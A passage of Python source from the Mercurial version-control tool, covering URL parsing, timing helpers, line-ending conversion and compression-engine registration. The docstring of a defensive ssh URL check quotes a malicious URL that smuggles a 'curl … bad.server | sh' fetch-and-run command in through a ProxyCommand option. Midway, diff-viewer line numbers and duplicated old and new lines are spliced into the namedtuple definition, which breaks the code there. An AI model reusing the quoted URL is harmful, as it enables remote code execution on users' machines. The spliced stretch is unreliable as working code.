    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )

class transformingwriter(object):
    """Writable file wrapper to transform data by function"""

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def close(self):
        self._fp.close()

    def flush(self):
        self._fp.flush()

    def write(self, data):
        return self._fp.write(self._encode(data))

# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    return _eolre.sub('\n', s)

def tocrlf(s):
    return _eolre.sub('\r\n', s)

def _crlfwriter(fp):
    return transformingwriter(fp, tocrlf)

if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity

if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we work around the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can work around the EINTR issue for fp.__iter__, it is
    # slower: "for x in fp" is 4x faster than "for x in iter(fp.readline, '')"
    # in CPython 2, because CPython 2 maintains an internal readahead buffer
    # for fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp

def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line

def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)

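# Editorial sketch, not part of the original change (mapping keys and
# sample strings are hypothetical): expand prefix-marked placeholders.
#
#   interpolate('%', {'H': 'deadbeef', 'R': '42'}, 'rev %R is %H')
#   # -> 'rev 42 is deadbeef'
#   interpolate(br'\$', {'x': 'y'}, 'cost: $x $$5', escape_prefix=True)
#   # -> 'cost: y $5' (the doubled '$$' escapes to a literal '$')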
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(_("no port number associated with service '%s'")
                          % port)

class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    _safechars = "!~*'()+"
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise error.Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')

def hasscheme(path):
    return bool(url(path).scheme)

def hasdriveletter(path):
    return path and path[1:2] == ':' and path[0:1].isalpha()

def urllocalpath(path):
    return url(path, parsequery=False, parsefragment=False).localpath()

def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(path),))

def hidepassword(u):
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = '***'
    return bytes(u)

def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return bytes(u)

timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

@attr.s
class timedcmstats(object):
    """Stats information produced by the timedcm context manager on entering."""

    # the starting value of the timer as a float (meaning and resolution is
    # platform dependent, see util.timer)
    start = attr.ib(default=attr.Factory(lambda: timer()))
    # the number of seconds as a floating point value; starts at 0, updated when
    # the context is exited.
    elapsed = attr.ib(default=0)
    # the number of nested timedcm context managers.
    level = attr.ib(default=1)

    def __bytes__(self):
        return timecount(self.elapsed) if self.elapsed else '<unknown>'

    __str__ = encoding.strmethod(__bytes__)

@contextlib.contextmanager
def timedcm(whencefmt, *whenceargs):
    """A context manager that produces timing information for a given context.

    On entering a timedcmstats instance is produced.

    This context manager is reentrant.

    """
    # track nested context managers
    timedcm._nested += 1
    timing_stats = timedcmstats(level=timedcm._nested)
    try:
        with tracing.log(whencefmt, *whenceargs):
            yield timing_stats
    finally:
        timing_stats.elapsed = timer() - timing_stats.start
        timedcm._nested -= 1

timedcm._nested = 0

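# Editorial sketch, not part of the original change (the timed block is
# hypothetical):
#
#   with timedcm('load-%s', 'manifest') as stats:
#       pass   # ... timed work ...
#   # afterwards, stats.elapsed holds seconds; bytes(stats) renders a
#   # human-readable duration via timecount(), e.g. '1.23 ms'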
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
            result = func(*args, **kwargs)
        stderr = procutil.stderr
        stderr.write('%s%s: %s\n' % (
            ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
            time_stats))
        return result
    return wrapper

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results

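# Editorial sketch, not part of the original change (the source names and
# callables are hypothetical): hooks run sorted by source name, so the
# 'aaa-ext' hook fires before the 'zzz-ext' one regardless of add() order.
#
#   h = hooks()
#   h.add('zzz-ext', lambda v: v * 2)
#   h.add('aaa-ext', lambda v: v + 1)
#   h(10)   # -> [11, 20], results in lexicographic source order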
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code but very convenient while developing.
    '''
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=procutil.stderr, otherf=procutil.stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()

class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)

# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

3214 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3214 compewireprotosupport = collections.namedtuple(r'compenginewireprotosupport',
3215 (u'name', u'serverpriority',
3215 (r'name', r'serverpriority',
3216 u'clientpriority'))
3216 r'clientpriority'))
3217
3217
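# Illustrative sketch (editor's addition): the type and field names above are
# raw (native str) literals because namedtuple() expects native strings on
# both Python 2 and Python 3. Records are consumed by field name:
def _demo_compewireprotosupport():
    support = compewireprotosupport('zlib', 20, 20)
    return support.name, support.serverpriority, support.clientpriority
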
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # Only register the external-facing name if one was declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

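# Illustrative sketch (editor's addition): typical lookups against the global
# manager. The names used here ('zlib', 'gzip') are registered further down
# in this module.
def _demo_compengine_lookup():
    zlib_engine = compengines['zlib']                # by engine name
    gzip_engine = compengines.forbundlename('gzip')  # by bundle spec name
    assert zlib_engine is gzip_engine
    # Engines a server would advertise, most preferred first:
    return compengines.supportedwireengines(SERVERROLE)
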
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also
        implement ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of chunks of bytes representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``StorageError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

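# Illustrative sketch (editor's addition): a minimal hypothetical engine that
# satisfies the interface above without actually compressing anything, to show
# which methods a new engine must provide before being passed to register().
# The name 'identity-demo' and the class itself are invented for illustration.
class _demoidentityengine(compressionengine):
    def name(self):
        return 'identity-demo'

    # bundletype(), wireprotosupport() and revlogheader() inherit the None
    # defaults, so this engine opts out of bundles, wire proto and revlogs.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

# compengines.register(_demoidentityengine())  # would make it discoverable
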
class _CompressedStreamReader(object):
    def __init__(self, fh):
        if safehasattr(fh, 'unbufferedread'):
            self._reader = fh.unbufferedread
        else:
            self._reader = fh.read
        self._pending = []
        self._pos = 0
        self._eof = False

    def _decompress(self, chunk):
        raise NotImplementedError()

    def read(self, l):
        buf = []
        while True:
            while self._pending:
                if len(self._pending[0]) > l + self._pos:
                    newbuf = self._pending[0]
                    buf.append(newbuf[self._pos:self._pos + l])
                    self._pos += l
                    return ''.join(buf)

                newbuf = self._pending.pop(0)
                if self._pos:
                    buf.append(newbuf[self._pos:])
                    l -= len(newbuf) - self._pos
                else:
                    buf.append(newbuf)
                    l -= len(newbuf)
                self._pos = 0

            if self._eof:
                return ''.join(buf)
            chunk = self._reader(65536)
            self._decompress(chunk)
            if not chunk and not self._pending and not self._eof:
                # No progress and no new data, bail out
                return ''.join(buf)

class _GzipCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_GzipCompressedStreamReader, self).__init__(fh)
        self._decompobj = zlib.decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        d = self._decompobj.copy()
        try:
            d.decompress('x')
            d.flush()
            if d.unused_data == 'x':
                self._eof = True
        except zlib.error:
            pass

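# Illustrative sketch (editor's addition): round-tripping a zlib stream
# through the reader above. Follows this module's Python 2 convention of
# native byte strings.
def _demo_gzip_stream_reader():
    import io
    payload = b'hello world' * 100
    reader = _GzipCompressedStreamReader(io.BytesIO(zlib.compress(payload)))
    out = b''
    while True:
        chunk = reader.read(4096)
        if not chunk:
            break
        out += chunk
    assert out == payload
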
class _BZ2CompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_BZ2CompressedStreamReader, self).__init__(fh)
        self._decompobj = bz2.BZ2Decompressor()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except EOFError:
            self._eof = True

class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
    def __init__(self, fh):
        super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
        newbuf = self._decompobj.decompress('BZ')
        if newbuf:
            self._pending.append(newbuf)

class _ZstdCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh, zstd):
        super(_ZstdCompressedStreamReader, self).__init__(fh)
        self._zstd = zstd
        self._decompobj = zstd.ZstdDecompressor().decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
